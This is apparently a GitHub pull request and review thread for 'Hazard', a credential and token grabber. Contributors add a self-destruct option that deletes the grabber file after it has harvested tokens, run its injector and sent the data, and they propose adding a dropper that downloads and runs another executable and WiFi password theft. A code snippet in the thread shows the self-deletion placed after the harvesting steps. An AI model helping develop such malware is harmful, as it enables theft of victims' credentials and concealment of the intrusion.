### PR TITLE
Added Self Destruct and Fixed bug that I Added (+ Another feature if u want me to add)

### PR DESCRIPTION
**Pull request by PandoricGalaxy**
I added self destruct toggle which will delete the grabber file after whole execution is done. (Check config)
I fixed bug that i added bymistake on the last pull request

Do u want me to add the ability to download and run another exe (with direct download link) with this program?
It could be used like this:
This program is a grabber that grabs first then downloads and runs another exe.

**NOTE ON SELF_DESTRUCT:**

> **You cannot use this if you are converting file to exe, you can obfuscate the .py but not convert
> it to exe. if you want to convert it to exe then keep this false since you cannot use this with exe [cause exe cannot delete itself since its running]**

### CODE REVIEW

**Comment by ghost** [comment]
wifi password stealer?

**Comment by PandoricGalaxy** [comment]
> wifi password stealer?

Why would u want thier wifi passwords? U need to actually connect to their wifi to do anything

**Comment by ghost** [comment]
> > wifi password stealer?
> 
> Why would u want thier wifi passwords? U need to actually connect to their wifi to do anything

many things can be done with wifi saved passwords.

**Comment by PandoricGalaxy** [comment]
> > > wifi password stealer?
> > 
> > 
> > Why would u want thier wifi passwords? U need to actually connect to their wifi to do anything
> 
> many things can be done with wifi saved passwords.

Like?

**Comment by ghost** [comment]
> 



> > > > wifi password stealer?
> > > 
> > > 
> > > Why would u want thier wifi passwords? U need to actually connect to their wifi to do anything
> > 
> > 
> > many things can be done with wifi saved passwords.
> 
> Like?

I didn't understand?

**Comment by PandoricGalaxy** [comment]
> > 
> 
> > > > > wifi password stealer?
> > > > 
> > > > 
> > > > Why would u want thier wifi passwords? U need to actually connect to their wifi to do anything
> > > 
> > > 
> > > many things can be done with wifi saved passwords.
> > 
> > 
> > Like?
> 
> I didn't understand?

U said many things can be done with wifi passwords so I asked like what?

**Comment by Mantelyys** [comment]
Why do you fetch config at the end of the file and then remove the file? You can do it after self.finish()

**Comment by PandoricGalaxy** [comment]
> Why do you fetch config at the end of the file and then remove the file? You can do it after self.finish()

I fetch config to check if the user want to delete the file or not with the true or false.

It's at the end cause the file is deleting itself and so no more code will be executed after it so I can't add it in the middle

**Comment by Mantelyys** [comment]
Ik it checks if user wants to delete but you write the same lines of code two times in one file. Check on my file line 132-134.
When you run Hazard, it runs from init() (242 line) and it runs all the functions in init() and checks the config as you see in line 243, 250, 253, 256 and etc. So you can add remove file after self.finish() as it will be finished sending by then.

```
        self.neatifyTokens()
        
        await self.injector()
        
        self.finish()
        
        shutil.rmtree(self.dir)
        
        if self.fetchConf('self_destruct'):
            if getattr(sys, 'frozen', False):
                path = os.path.realpath(sys.executable)
            elif __file__:
                path = os.path.realpath(__file__)
                os.remove(path)
```
More like it.

**Comment by PandoricGalaxy** [comment]
> Ik it checks if user wants to delete but you write the same lines of code two times in one file. Check on my file line 132-134. When you run Hazard, it runs from init() (242 line) and it runs all the functions in init() and checks the config as you see in line 243, 250, 253, 256 and etc. So you can add remove file after self.finish() as it will be finished sending by then.

I'm not at all a programmer and so I didn't really know what to do and I just put my basic logic that file would delete itself after **all** code is run so i had just put it at last and the duplicate method is cause it was not using the one mentioned first so i added this and it works so i just put it there. You could edit the commit, I dont really know what to do so yeah...

**Comment by PandoricGalaxy** [comment]
that looks better!

**Comment by Mantelyys** [comment]
Add wifi passwords or no?

**Comment by PandoricGalaxy** [comment]
> Add wifi passwords or no?

Me or u? If u then idk really whats the use and if me then na idk what's the use of wifi passwords

**Review by Mantelyys — APPROVED** [review]

**Pull request merged**
